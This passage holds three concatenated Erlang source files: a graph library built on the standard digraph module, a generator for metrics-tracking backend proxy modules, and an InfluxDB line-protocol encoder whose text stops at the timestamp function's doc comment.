%% <li><code>f</code> is for floating point number weights in proper Erlang syntax.</li>
%% </ul>
%% </li>
%% </ul>
%% </li>
%% <li>The next M lines will consist of the edge descriptions.
%% Each line will contain three terms : U V W.
%% This will denote an edge from U to V with W weight (W applies only if the graph is weighted).</li>
%% </ul>
%%
%% <h3>Alternative syntax</h3>
%% <p>There is also the ability to explicitly state the vertices of the graph and load the graph with <code>from_file/3</code>.
%% In this case the above format is amended as follows:</p>
%%
%% <ul>
%% <li>
%% The 1st line remains unchanged.
%% </li>
%% <li>
%% The 2nd line consists of the vertices. The user will provide a function that will parse this line and return
%% a list of the vertices. The spec of this function is
%% <code>fun(file:io_device(), integer()) -> [vertex()].</code>
%% </li>
%% <li>
%% The next M lines that consist of the edge descriptions remain unchanged.
%% However, the user will provide a function that will parse each line and return
%% the three required terms : U V W. The spec of this function is
%% <code>fun(file:io_device(), weighttype()) -> {vertex(), vertex(), weight()}.</code>
%% </li>
%% </ul>
%%
%% <p>For examples you can check the <code>graph_demo</code> module.</p>
%%
-module(graph).
-export([from_file/1, from_file/3, del_graph/1, vertices/1, edges/1, edge_weight/2,
edges_with_weights/1, out_neighbours/2, num_of_vertices/1, equal/2,
num_of_edges/1, degree/2, get_cycle/2, is_tree/1, pprint/1, graph2text/1, empty/1, empty/2, new/1, new/3, add_vertex/2, add_edge/3,
add_edge/4, graph_type/1, del_vertex/2, del_edge/2, weight_type/1, export/3, import/2]).
-export_type([graph/0, vertex/0, edge/0, weight/0]).
%%
%% @type graph(). A directed or undirected graph.
%% <p>It is wrapper for a digraph with the extra information on its type.</p>
%%
-record(graph, {
    %% directed | undirected
    type :: graphtype(),
    %% the underlying stdlib digraph (always directed internally)
    graph :: digraph:graph(),
    %% unweighted | d (integer weights) | f (float weights)
    weightType :: weighttype()
}).

-type graph() :: #graph{}.
-type vertex() :: term().
-type edge() :: {vertex(), vertex()}.
-type graphtype() :: directed | undirected.
-type weight() :: number().
-type weighttype() :: unweighted | d | f.

%% @doc Create a new empty unweighted graph.
-spec empty(graphtype()) -> graph().
empty(Type) when Type =:= directed; Type =:= undirected ->
    #graph{type=Type, graph=digraph:new(), weightType = unweighted}.

%% @doc Create a new empty graph with a specific weight type.
-spec empty(graphtype(), weighttype()) -> graph().
empty(T, WT) when (T =:= directed orelse T =:= undirected) andalso
                  (WT =:= unweighted orelse WT =:= d orelse WT =:= f) ->
    #graph{type=T, graph=digraph:new(), weightType=WT}.
%% @doc Create a copy of an existing graph.
%% The copy has the same type, weight type, vertices and weighted edges,
%% but is backed by a fresh digraph.
-spec new(graph()) -> graph().
new(G) when is_record(G, graph) ->
    Copy = empty(G#graph.type, G#graph.weightType),
    lists:foreach(fun(V) -> add_vertex(Copy, V) end, vertices(G)),
    lists:foreach(
        fun({{From, To}, Wt}) -> add_edge(Copy, From, To, Wt) end,
        edges_with_weights(G)),
    Copy.
%% @doc Create a graph of the given type from lists of vertices and edges.
%% Edges may carry an explicit weight ({{V1, V2}, Wt}) or be bare pairs
%% ({V1, V2}), which receive the default unit weight.
-spec new(graphtype(), [vertex()], [edge()]) -> graph().
new(Type, Vertices, Edges) ->
    Graph = graph:empty(Type),
    lists:foreach(fun(V) -> graph:add_vertex(Graph, V) end, Vertices),
    AddEdge =
        fun({{V1, V2}, Wt}) -> graph:add_edge(Graph, V1, V2, Wt);
           ({V1, V2}) -> graph:add_edge(Graph, V1, V2)
        end,
    lists:foreach(AddEdge, Edges),
    Graph.
%% @doc Create a new graph from a file using the default behaviour.
-spec from_file(file:name()) -> graph().
from_file(File) ->
    from_file(File, fun read_vertices/2, fun read_edge/2).
%% @doc Create a new graph from a file using a custom behaviour.
%% <p>The user must provide the 2 functions for reading the vertices and the
%% edge descriptions.</p>
%%
%% <p>ReadVertices will take the file descriptor and the number of vertices and
%% return the list of the vertices.</p>
%%
%% <p>ReadEdge will take the file descriptor and the type of the weights of the graph and
%% return the tuple {V1, V2, W}, where V1 is the start of the edge, V2 is the end of the edge
%% and W is the weight of the edge (for unweighted graphs the edge must be 1).</p>
-spec from_file(file:name(), function(), function()) -> graph().
from_file(File, ReadVertices, ReadEdge) ->
    {ok, IO} = file:open(File, [read]),
    %% Close the descriptor even when parsing crashes; the previous
    %% implementation leaked the io_device on every call.
    try
        %% N = Number of Vertices :: non_neg_integer()
        %% M = Number of Edges :: non_neg_integer()
        %% T = Graph Type :: directed | undirected
        %% W = Edge Weight weighted :: Weight Type (d | f) | unweighted
        {ok, [N, M, T, W]} = io:fread(IO, ">", "~d ~d ~a ~a"),
        G = #graph{type=T, graph=digraph:new(), weightType=W},
        ok = init_vertices(IO, G, N, ReadVertices),
        ok = init_edges(IO, G, M, ReadEdge, T, W),
        G
    after
        _ = file:close(IO)
    end.
%% @doc Default function for reading the vertices from a file.
%% <p>The default behaviour is that, given the number of vertices, each vertex
%% is assigned to an integer.</p>
%% Nothing is actually read from the device here; the vertices are simply
%% the integers 0..N-1.
-spec read_vertices(file:io_device(), integer()) -> [integer()].
read_vertices(_IO, N) -> lists:seq(0, N-1).
%% @doc Default function for reading the edge description from a file.
%% <p>The default behaviour is that the edge description is a line that contains
%% three terms: U V W (W applies only to weighted graphs).</p>
%%
%% <p>U is the integer that denotes the start of the edge.</p>
%% <p>V is the integer that denotes the end of the edge.</p>
%% <p>W is the number that denotes the weight of the edge.</p>
-spec read_edge(file:io_device(), weighttype()) -> {vertex(), vertex(), weight()}.
read_edge(IO, WT) ->
    read_edge(IO, WT, fun erlang:list_to_integer/1).
%% Unweighted graphs: only two terms are read and the weight defaults to 1.
read_edge(IO, unweighted, MapVertex) ->
    {ok, [V1, V2]} = io:fread(IO, ">", "~s ~s"),
    {MapVertex(V1), MapVertex(V2), 1};
%% Weighted graphs: the weight type atom (d | f) doubles as the io:fread
%% control character, so the weight is parsed as an integer or a float.
read_edge(IO, WT, MapVertex) ->
    Format = "~s ~s ~" ++ atom_to_list(WT),
    {ok, [V1, V2, W]} = io:fread(IO, ">", Format),
    {MapVertex(V1), MapVertex(V2), W}.
%% Initialize the vertices of the graph.
%% ReadVertices produces the vertex list; each vertex is then added to the
%% graph. lists:foreach/2 returns ok, which satisfies the spec.
-spec init_vertices(file:io_device(), graph(), integer(), function()) -> ok.
init_vertices(IO, Graph, N, ReadVertices) ->
    Vs = ReadVertices(IO, N),
    lists:foreach(fun(V) -> add_vertex(Graph, V) end, Vs).
%% Initialize the edges of the graph.
%% Reads exactly M edge descriptions from the device, adding each to G.
-spec init_edges(file:io_device(), graph(), integer(), function(), graphtype(), weighttype()) -> ok.
init_edges(_IO, _G, 0, _ReadEdge, _T, _WT) -> ok;
init_edges(IO, G, M, ReadEdge, T, WT) ->
    {V1, V2, W} = ReadEdge(IO, WT),
    _ = add_edge(G, V1, V2, W),
    init_edges(IO, G, M-1, ReadEdge, T, WT).
%% @doc Delete a graph, releasing the underlying digraph.
-spec del_graph(graph()) -> 'true'.
del_graph(G) ->
    digraph:delete(G#graph.graph).
%% @doc Return the type of the graph (directed | undirected).
-spec graph_type(graph()) -> graphtype().
graph_type(G) ->
    G#graph.type.
%% @doc Return the type of the weights (unweighted | d | f).
-spec weight_type(graph()) -> weighttype().
weight_type(G) ->
    G#graph.weightType.
%% @doc Add a vertex to a graph.
-spec add_vertex(graph(), vertex()) -> vertex().
add_vertex(G, V) ->
    digraph:add_vertex(G#graph.graph, V).
%% @doc Delete a vertex from a graph, along with its incident edges.
%% (The previous doc comment was copy-pasted from add_vertex/2 and the
%% spec claimed vertex(); digraph:del_vertex/2 returns 'true'.)
-spec del_vertex(graph(), vertex()) -> 'true'.
del_vertex(G, V) ->
    digraph:del_vertex(G#graph.graph, V).
%% @doc Return a list of the vertices of a graph.
-spec vertices(graph()) -> [vertex()].
vertices(G) ->
    digraph:vertices(G#graph.graph).
%% @doc Return the number of vertices in a graph.
-spec num_of_vertices(graph()) -> non_neg_integer().
num_of_vertices(G) ->
    digraph:no_vertices(G#graph.graph).
%% @doc Add an edge to an unweighted graph.
%% <p>Create an edge with unit weight.</p>
-spec add_edge(graph(), vertex(), vertex()) -> edge().
add_edge(G, From, To) ->
    add_edge(G, From, To, 1).
%% @doc Add an edge to a weighted graph.
%% The tuple {From, To} is used as the digraph edge identifier. Undirected
%% graphs store each edge as a mirrored pair ({From, To} and {To, From})
%% sharing the same weight. Non-numeric weights are rejected with an
%% error tuple instead of creating the edge.
-spec add_edge(graph(), vertex(), vertex(), weight()) -> edge() | {error, not_numeric_weight}.
add_edge(#graph{type=directed, graph=G}, From, To, W) when is_number(W) ->
    digraph:add_edge(G, {From, To}, From, To, W);
add_edge(#graph{type=undirected, graph=G}, From, To, W) when is_number(W) ->
    digraph:add_edge(G, {From, To}, From, To, W),
    digraph:add_edge(G, {To, From}, To, From, W);
add_edge(_G, _From, _To, _W) ->
    {error, not_numeric_weight}.
%% @doc Delete an edge from a graph.
%% For undirected graphs both stored directions of the edge are removed.
-spec del_edge(graph(), edge()) -> 'true'.
del_edge(#graph{type=directed} = G, E) ->
    digraph:del_edge(G#graph.graph, E);
del_edge(#graph{type=undirected} = G, {From, To}) ->
    digraph:del_edge(G#graph.graph, {From, To}),
    digraph:del_edge(G#graph.graph, {To, From}).
%% @doc Return a list of the edges of a graph.
%% Undirected graphs store every edge as a mirrored pair ({From, To} and
%% {To, From}); only one representative per pair is returned. The order
%% of the returned list is unspecified.
-spec edges(graph()) -> [edge()].
edges(G) ->
    Es = digraph:edges(G#graph.graph),
    case G#graph.type of
        directed -> Es;
        undirected -> remove_duplicate_edges(Es, sets:new(), [])
    end.
%% Keep the first representative of every {From, To}/{To, From} pair.
%% Tracking seen edges in a set replaces the previous per-element `--'
%% subtraction, which made the dedup quadratic in the number of edges.
remove_duplicate_edges([], _Seen, Acc) ->
    lists:reverse(Acc);
remove_duplicate_edges([{From, To} = E | Es], Seen, Acc) ->
    case sets:is_element({To, From}, Seen) of
        true -> remove_duplicate_edges(Es, Seen, Acc);
        false -> remove_duplicate_edges(Es, sets:add_element(E, Seen), [E | Acc])
    end.
%% @doc Return the number of edges in a graph.
%% For undirected graphs the internal mirrored-edge count is halved.
%% NOTE(review): an undirected self-loop is stored under a single edge
%% identifier, so `M div 2' appears to undercount graphs containing
%% self-loops -- confirm whether self-loops are meant to be supported.
-spec num_of_edges(graph()) -> non_neg_integer().
num_of_edges(G) ->
    M = digraph:no_edges(G#graph.graph),
    case G#graph.type of
        directed -> M;
        undirected -> M div 2
    end.
%% @doc Return the weight of an edge, or false when the edge is absent.
-spec edge_weight(graph(), edge()) -> weight() | 'false'.
edge_weight(G, E) ->
    case digraph:edge(G#graph.graph, E) of
        {E, _V1, _V2, W} -> W;
        false -> false
    end.
%% @doc Return a list of the edges of a graph along with their weights.
-spec edges_with_weights(graph()) -> [{edge(), weight()}].
edges_with_weights(G) ->
    Es = edges(G),
    lists:map(fun(E) -> {E, edge_weight(G, E)} end, Es).
%% @doc Return a list of the out neighbours of a vertex.
-spec out_neighbours(graph(), vertex()) -> [vertex()].
out_neighbours(G, V) ->
    digraph:out_neighbours(G#graph.graph, V).
%% @doc Return the degree of a vertex.
%% Undirected edges are stored as mirrored pairs, so the out-degree alone
%% already equals the vertex degree; directed degree is in + out.
-spec degree(graph(),vertex())->non_neg_integer().
degree(#graph{graph = G,type = undirected},V)->
    digraph:out_degree(G,V); %could be in or out degree
degree(#graph{graph = G,type = directed},V)->
    digraph:out_degree(G,V)+digraph:in_degree(G,V).
%% @doc Check if underlying graph is a tree
%%
%% This is a wrapper for digraph:is_tree()
%% digraph_utils:is_tree/1 assumes directed semantics, so an undirected
%% graph is instead recognised as a tree when it is connected and has
%% exactly V - 1 (logical) edges.
is_tree(#graph{graph = G,type = undirected}) ->
    ((digraph:no_edges(G) div 2) =:= digraph:no_vertices(G) - 1)
    andalso (length(digraph_utils:components(G)) =:= 1);
is_tree(#graph{graph = G}) ->
    digraph_utils:is_tree(G).
%% @doc Returns a list of vertices that are part of cycle.
%%
%% In undirected graph, even if there are no cycles present,
%% digraph:get_cycle would return a list of
%% 3 vertices with first and last one being the same as requested
%% vertex. This does not represent a cycle.
%% For undirected graphs a local one_path/8 walk is used instead, pruning
%% candidate paths shorter than 3 vertices and rejecting a [V, _, V]
%% result (one edge walked forth and back).
%% NOTE(review): this function can also return 'false' when no cycle
%% exists, which the [vertex()] spec does not capture -- confirm.
-spec get_cycle(graph(), vertex()) -> [vertex()].
get_cycle(#graph{graph = G,type = undirected},V)->
    case one_path(digraph:out_neighbours(G, V), V, [], [V], [V], 3, G, 1) of
        false ->
            %% No long-enough path back to V; a self-loop still counts as
            %% a one-vertex cycle.
            case lists:member(V, digraph:out_neighbours(G, V)) of
                true -> [V];
                false -> false
            end;
        [V,_,V] ->
            %% Forth-and-back over a single undirected edge: not a cycle.
            false;
        Vs ->
            Vs
    end;
get_cycle(#graph{graph = G,type = directed},V)->
    digraph:get_cycle(G,V).
%% @doc Helper functions to support get_cycle
%%
%% Following code is copy-paste from digraph source code, except for the place
%% where one_path is called with Prune parameter of 3 for undirected graphs. This
%% code is internal to digraph module.
%% prune_short_path (evaluate conditions on path)
%% short : if path is too short
%% ok : if path is ok
%%
prune_short_path(Counter, Min) when Counter < Min ->
    short;
prune_short_path(_Counter, _Min) ->
    ok.
%% one_path/8 is a depth-first search from the neighbours of the target
%% vertex W. Ps holds the current path (reversed), Xs the visited set,
%% Cont a stack of backtracking continuations, and Counter the current
%% path length (compared against Prune to reject too-short cycles).
one_path([W|Ws], W, Cont, Xs, Ps, Prune, G, Counter) ->
    case prune_short_path(Counter, Prune) of
        short -> one_path(Ws, W, Cont, Xs, Ps, Prune, G, Counter);
        ok -> lists:reverse([W|Ps])
    end;
one_path([V|Vs], W, Cont, Xs, Ps, Prune, G, Counter) ->
    case lists:member(V, Xs) of
        true -> one_path(Vs, W, Cont, Xs, Ps, Prune, G, Counter);
        false -> one_path(digraph:out_neighbours(G, V), W,
                          [{Vs,Ps} | Cont], [V|Xs], [V|Ps],
                          Prune, G, Counter+1)
    end;
one_path([], W, [{Vs,Ps}|Cont], Xs, _, Prune, G, Counter) ->
    one_path(Vs, W, Cont, Xs, Ps, Prune, G, Counter-1);
one_path([], _, [], _, _, _, _, _Counter) -> false.
%% @doc Pretty print a graph to standard output.
-spec pprint(Graph) -> ok when
      Graph :: graph() | digraph:graph().
pprint(G) ->
    io:format("~s", [graph2text(G)]).
%% @doc Render a graph as a flat string of the form
%% [{From, [{To, Weight}]}], sorted by source vertex. Can be used in log
%% messages.
-spec graph2text(Graph) -> list() when
      Graph :: graph() | digraph:graph().
graph2text(G) when is_record(G, graph) ->
    graph2text(G#graph.graph);
graph2text(D) ->
    Adjacency =
        [{V,
          [begin
               {E, _V1, V2, W} = digraph:edge(D, E),
               {V2, W}
           end
           || E <- digraph:out_edges(D, V)]}
         || V <- digraph:vertices(D)],
    Sorted = lists:sort(fun erlang:'<'/2, Adjacency),
    lists:flatten(
        io_lib:format("[{From, [{To, Weight}]}]~n", []) ++
        io_lib:format("========================~n", []) ++
        io_lib:format("~p~n", [Sorted])
    ).
%% @doc Exports a graph to a file.
%% <p>The user must provide the function that will generate the textual
%% representation of a vertex.</p>
%%
%% <p>DumpVertex will take a vertex and return its textual representation.</p>
%% The written format matches what from_file/3 and import/2 expect:
%% a header line, a vertex line, then one line per edge.
-spec export(graph(), file:name(), fun((vertex()) -> string())) -> ok.
export(Graph, Filename, DumpVertex) ->
    {ok, IO} = file:open(Filename, [write]),
    export_graph_info(IO, Graph),
    export_vertices(IO, Graph, DumpVertex),
    export_edges(IO, Graph, DumpVertex),
    file:close(IO).
%% Write the header line: "N M GraphType WeightType".
export_graph_info(IO, Graph) ->
    N = num_of_vertices(Graph),
    M = num_of_edges(Graph),
    GT = graph_type(Graph),
    WT = weight_type(Graph),
    io:fwrite(IO, "~w ~w ~w ~w~n", [N, M, GT, WT]).
%% Write all vertices on a single space-separated line.
export_vertices(IO, Graph, DumpVertex) ->
    Vs = vertices(Graph),
    Rs = [io_lib:format("~s", [DumpVertex(V)]) || V <- Vs],
    io:fwrite(IO, "~s~n", [string:join(Rs, " ")]).
%% Write one "From To Weight" line per edge.
export_edges(IO, Graph, DumpVertex) ->
    Es = edges(Graph),
    lists:foreach(
        fun({V1, V2}=E) ->
            W = edge_weight(Graph, E),
            io:fwrite(IO, "~s ~s ~w~n", [DumpVertex(V1), DumpVertex(V2), W])
        end,
        Es).
%% @doc Imports an exported graph.
%% <p>The user must provide the function that will parse the textual
%% representation of a vertex.</p>
%%
%% <p>MapVertex will take the textual representation of a vertex and return
%% the actual vertex.</p>
-spec import(file:name(), fun((string()) -> vertex())) -> graph().
import(File, MapVertex) ->
    ImportVs = fun(IO, _N) -> import_vertices(IO, MapVertex) end,
    ImportEs = fun(IO, WT) -> read_edge(IO, WT, MapVertex) end,
    from_file(File, ImportVs, ImportEs).
%% Read the vertex line and map every space-separated token to a vertex.
%% Both "\n" and "\r\n" line endings are handled: the trailing newline is
%% stripped first, then any remaining carriage return. (The previous code
%% stripped "$\n" twice, leaving a stray "\r" for files written with
%% Windows line endings.)
import_vertices(IO, MapVertex) ->
    Line = io:get_line(IO, ""),
    Strip1 = string:strip(Line, right, $\n),
    Strip2 = string:strip(Strip1, right, $\r),
    Vs = string:tokens(Strip2, " "),
    [MapVertex(V) || V <- Vs].
%% @doc Check whether two graphs are equal: same graph type, weight type,
%% vertex set, edge set and per-edge weights.
-spec equal(graph(), graph()) -> boolean().
equal(G1, G2) ->
    Checks =
        [fun() -> graph_type(G1) =:= graph_type(G2) end,
         fun() -> weight_type(G1) =:= weight_type(G2) end,
         fun() -> num_of_vertices(G1) =:= num_of_vertices(G2) end,
         fun() -> num_of_edges(G1) =:= num_of_edges(G2) end,
         fun() -> lists:sort(vertices(G1)) =:= lists:sort(vertices(G2)) end,
         fun() -> equal_edges(G1, G2) end],
    %% lists:all/2 short-circuits, preserving the original check order.
    lists:all(fun(Check) -> Check() end, Checks).
%% Compare the sorted edge lists and, when they coincide, compare the
%% weight of every edge position by position.
equal_edges(G1, G2) ->
    SortedEs1 = lists:sort(edges(G1)),
    SortedEs2 = lists:sort(edges(G2)),
    SortedEs1 =:= SortedEs2 andalso
        edge_weights(G1, SortedEs1) =:= edge_weights(G2, SortedEs2).
%% Collect the weight of every edge in Es, in order.
edge_weights(G, Es) ->
    [edge_weight(G, E) || E <- Es].
%%%-------------------------------------------------------------------
%%% @author yangcancai
%%% Copyright (c) 2021 by yangcancai(<EMAIL>), All Rights Reserved.
%%%
%%% Licensed under the Apache License, Version 2.0 (the "License");
%%% you may not use this file except in compliance with the License.
%%% You may obtain a copy of the License at
%%%
%%% https://www.apache.org/licenses/LICENSE-2.0
%%%
%%% Unless required by applicable law or agreed to in writing, software
%%% distributed under the License is distributed on an "AS IS" BASIS,
%%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%%% See the License for the specific language governing permissions and
%%% limitations under the License.
%%%
%%% @doc
%%%
%%% @end
%%% Created : 2021-09-08T09:25:12+00:00
%%%-------------------------------------------------------------------
-module(cool_tools_backend).
-author("yangcancai").
-export([create/2, create/3]).
-export([backend_module/2]).
%% Callback implemented by proxy modules.
-callback backend() -> module().
%% API

%% @doc Create and load a proxy module forwarding the For behaviour to
%% the backend named Name, without tracking any functions.
-spec create(For :: module(), Name :: atom()) -> {ok, module()} | {error, already_loaded}.
create(For, Name) ->
    create(For, Name, []).

%% @doc Create and load a proxy module forwarding the Module behaviour to
%% the backend named Backend. Calls to the functions listed in
%% TrackedFuns are additionally wrapped with call-count and latency
%% metrics. Returns {error, already_loaded} when the proxy already
%% points at the requested backend module.
-spec create(For :: module(), Name :: atom(), TrackedFuns :: [atom()]) ->
                {ok, module()} | {error, already_loaded}.
create(Module, Backend, TrackedFuns) ->
    ProxyModule = proxy_module(Module),
    BackendModule = backend_module(Module, Backend),
    ensure_backend_metrics(Module, TrackedFuns),
    %% The proxy may not exist yet, in which case calling it raises undef;
    %% treat any failure as "not loaded". (try/catch replaces the old
    %% `catch Expr' form, which conflates errors, exits and throws.)
    Current =
        try
            ProxyModule:backend()
        catch
            _:_ -> undefined
        end,
    case Current of
        BackendModule ->
            {error, already_loaded};
        _ ->
            {ProxyModuleStr, CodeString} = backend_code(Module, Backend, TrackedFuns),
            {Mod, Code} = cool_tools_compile:from_string(CodeString),
            %% Assert the load succeeded instead of ignoring a failure.
            {module, Mod} = code:load_binary(Mod, ProxyModuleStr ++ ".erl", Code),
            {ok, ProxyModule}
    end.
%% Internal functions

%% Name of the generated proxy module, e.g. foo -> foo_backend.
-spec proxy_module(Module :: module()) -> module().
proxy_module(Module) ->
    list_to_atom(lists:concat([Module, "_backend"])).

%% Name of the concrete backend module, e.g. foo + mnesia -> foo_mnesia.
-spec backend_module(Module :: module(), Backend :: atom()) -> module().
backend_module(Module, Backend) ->
    list_to_atom(lists:concat([Module, "_", Backend])).
%% Build the Erlang source text of the proxy module for Module/Backend.
%% The generated module exports backend/0, backend_name/0 and one
%% forwarding function per callback of Module's behaviour. Returns the
%% proxy module name (string) together with the flattened source.
-spec backend_code(module(), atom(), list()) -> {nonempty_string(), list()}.
backend_code(Module, Backend, TrackedFuns) when is_atom(Backend) ->
    Callbacks = Module:behaviour_info(callbacks),
    ModuleStr = atom_to_list(Module),
    ProxyModuleName = ModuleStr ++ "_backend",
    RealBackendModule = ModuleStr ++ "_" ++ atom_to_list(Backend),
    BehaviourExports = [generate_export(F, A) || {F, A} <- Callbacks],
    BehaviourImpl =
        [generate_fun(Module, RealBackendModule, F, A, TrackedFuns) || {F, A} <- Callbacks],
    Code =
        lists:flatten(["-module(",
                       ProxyModuleName,
                       ").\n",
                       "-behaviour(backend_module).\n-export([backend/0, backend_name/0]).\n",
                       BehaviourExports,
                       "-spec backend() -> atom().\n",
                       "backend() ->",
                       RealBackendModule,
                       ".\n",
                       "backend_name() ->",
                       atom_to_list(Backend),
                       ".\n",
                       BehaviourImpl]),
    {ProxyModuleName, Code}.
%% Render an -export attribute for F/A.
generate_export(F, A) ->
    "-export([" ++ atom_to_list(F) ++ "/" ++ integer_to_list(A) ++ "]).\n".
%% Render the proxy implementation of F/A; functions listed in
%% TrackedFuns get a metrics-instrumented body.
generate_fun(BaseModule, RealBackendModule, F, A, TrackedFuns) ->
    Args = string:join(["A" ++ integer_to_list(I) || I <- lists:seq(1, A)], ", "),
    IsTracked = lists:member(F, TrackedFuns),
    [fun_header(F, Args),
     " ->\n",
     generate_fun_body(IsTracked, BaseModule, RealBackendModule, F, Args)].
%% Render "F(A1, ..., An)".
fun_header(F, Args) ->
    [atom_to_list(F), "(", Args, ")"].
%% Metric name for the call latency of Op.
time_metric(Module, Op) ->
    [backends, Module, Op].
%% Metric name for the call count of Op.
calls_metric(Module, Op) ->
    [backends, Module, calls, Op].
%% Render the body of a forwarding function. Untracked functions simply
%% delegate to the backend module; tracked functions bump a call counter,
%% time the call with timer:tc/3 and record the latency.
generate_fun_body(false, _, RealBackendModule, F, Args) ->
    ["  ", RealBackendModule, ":", fun_header(F, Args), ".\n"];
generate_fun_body(true, BaseModule, RealBackendModule, F, Args) ->
    FS = atom_to_list(F),
    %% returned is the following
    %% cool_tools_metrics:update(global, calls_metric(Backend, F), 1),
    %% {Time, Result} = timer:tc(Backend, F, Args),
    %% cool_tools_metrics:update(global, time_metric(Backend, F), Time),
    %% Result.
    CallsMetric = io_lib:format("~p", [calls_metric(BaseModule, F)]),
    TimeMetric = io_lib:format("~p", [time_metric(BaseModule, F)]),
    ["  cool_tools_metrics:update(global, ",
     CallsMetric,
     ", 1), \n",
     "  {Time, Result} = timer:tc(",
     RealBackendModule,
     ", ",
     FS,
     ", [",
     Args,
     "]), \n",
     "  cool_tools_metrics:update(global, ",
     TimeMetric,
     ", Time), \n",
     "  Result.\n"].
%% Pre-create the call-count (spiral) and latency (histogram) metrics for
%% every tracked function, so later updates never hit a missing metric.
ensure_backend_metrics(Module, Ops) ->
    lists:foreach(
        fun(Op) ->
            cool_tools_metrics:ensure_metric(global, calls_metric(Module, Op), spiral),
            cool_tools_metrics:ensure_metric(global, time_metric(Module, Op), histogram)
        end,
        Ops).
%% Copyright (c) 2020-2021 <NAME> <<EMAIL>>.
%%
%% Permission to use, copy, modify, and/or distribute this software for any
%% purpose with or without fee is hereby granted, provided that the above
%% copyright notice and this permission notice appear in all copies.
%%
%% THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
%% WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
%% MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
%% SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
%% WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
%% ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR
%% IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
-module(influx_line_protocol).
-export([encode_point/1, encode_points/1,
encode_measurement/1,
encode_fields/1, encode_field/2, encode_field_value/1,
encode_tags/1, encode_tag/2, encode_key/1,
encode_string/1,
encode_timestamp/1]).
%% @doc Encode one data point in InfluxDB line protocol form:
%% measurement[,tags] fields[ timestamp]. The measurement and fields keys
%% are mandatory; tags and timestamp are optional.
-spec encode_point(influx:point()) -> iodata().
encode_point(Point) ->
  Measurement = maps:get(measurement, Point),
  Fields = maps:get(fields, Point),
  TagsData =
    case maps:get(tags, Point, #{}) of
      Tags when map_size(Tags) > 0 ->
        [$,, encode_tags(Tags)];
      _ ->
        []
    end,
  TimestampData =
    case Point of
      #{timestamp := Timestamp} ->
        [$\s, encode_timestamp(Timestamp)];
      _ ->
        []
    end,
  [encode_measurement(Measurement),
   TagsData,
   $\s, encode_fields(Fields),
   TimestampData].
%% @doc Encode a list of points, one line-protocol entry per line.
-spec encode_points([influx:point()]) -> iodata().
encode_points(Points) ->
  lists:map(fun(Point) -> [influx_line_protocol:encode_point(Point), $\n] end, Points).
%% @doc Encode a measurement name, escaping the characters that are
%% special in that position. Per the InfluxDB line protocol only commas
%% and spaces are escaped in measurement names; `=' must NOT be escaped
%% here (the previous code escaped it, which stores a literal backslash
%% in the measurement name since `\=' is not a recognised escape there).
-spec encode_measurement(influx:key()) -> binary().
encode_measurement(Measurement) when is_atom(Measurement) ->
  encode_measurement(atom_to_binary(Measurement), <<>>);
encode_measurement(Measurement) ->
  encode_measurement(unicode:characters_to_binary(Measurement), <<>>).
encode_measurement(<<>>, Acc) ->
  Acc;
encode_measurement(<<Char, Rest/binary>>, Acc) ->
  case Char of
    C when C =:= $,; C =:= $\s ->
      encode_measurement(Rest, <<Acc/binary, $\\, C>>);
    C ->
      encode_measurement(Rest, <<Acc/binary, C>>)
  end.
%% @doc Encode a field set as comma-joined `key=value' pairs, emitted in
%% ascending key order so the output is deterministic. The line protocol
%% requires at least one field, so an empty map is an error.
-spec encode_fields(influx:fields()) -> iodata().
encode_fields(Fields) when map_size(Fields) == 0 ->
  error(empty_fields);
encode_fields(Fields) ->
  SortedEntries = lists:keysort(1, maps:to_list(Fields)),
  lists:join($,, [encode_field(Key, Value) || {Key, Value} <- SortedEntries]).
%% @doc Encode a single `key=value' field pair.
-spec encode_field(influx:key(), influx:field_value()) -> iodata().
encode_field(Name, Value) ->
  [encode_key(Name), $=, encode_field_value(Value)].
%% @doc Encode a field value: booleans as bare words, integers with the
%% `i' suffix the line protocol requires, floats in shortest round-trip
%% form and binaries as quoted strings.
-spec encode_field_value(influx:field_value()) -> iodata().
encode_field_value(true) ->
  <<"true">>;
encode_field_value(false) ->
  <<"false">>;
encode_field_value(Value) when is_integer(Value) ->
  [integer_to_binary(Value), $i];
encode_field_value(Value) when is_float(Value) ->
  io_lib_format:fwrite_g(Value);
encode_field_value(Value) when is_binary(Value) ->
  encode_string(Value).
%% @doc Encode a tag set as comma-joined `key=value' pairs, emitted in
%% ascending key order so the output is deterministic.
-spec encode_tags(influx:tags()) -> iodata().
encode_tags(Tags) ->
  SortedEntries = lists:keysort(1, maps:to_list(Tags)),
  lists:join($,, [encode_tag(Key, Value) || {Key, Value} <- SortedEntries]).
%% @doc Encode a single `key=value' tag pair; tag values use key escaping.
-spec encode_tag(influx:key(), influx:key()) -> iodata().
encode_tag(Name, Value) ->
  [encode_key(Name), $=, encode_key(Value)].
%% @doc Encode a tag/field key (or tag value), escaping the characters
%% that are special in that position: comma, equals sign and space.
-spec encode_key(influx:key()) -> binary().
encode_key(Key) when is_atom(Key) ->
  escape_key(atom_to_binary(Key), <<>>);
encode_key(Key) ->
  escape_key(unicode:characters_to_binary(Key), <<>>).
%% Walk the binary, prefixing every special character with a backslash.
escape_key(<<C, Rest/binary>>, Acc) when C =:= $,; C =:= $=; C =:= $\s ->
  escape_key(Rest, <<Acc/binary, $\\, C>>);
escape_key(<<C, Rest/binary>>, Acc) ->
  escape_key(Rest, <<Acc/binary, C>>);
escape_key(<<>>, Acc) ->
  Acc.
%% @doc Encode a string field value: wrap it in double quotes and escape
%% embedded double quotes and backslashes.
-spec encode_string(binary()) -> iodata().
encode_string(Bin) ->
  [$", escape_string(Bin, <<>>), $"].
%% Walk the binary, prefixing `"' and `\' with a backslash.
escape_string(<<C, Rest/binary>>, Acc) when C =:= $"; C =:= $\\ ->
  escape_string(Rest, <<Acc/binary, $\\, C>>);
escape_string(<<C, Rest/binary>>, Acc) ->
  escape_string(Rest, <<Acc/binary, C>>);
escape_string(<<>>, Acc) ->
  Acc.
%% @doc Encode a timestamp as its decimal representation.
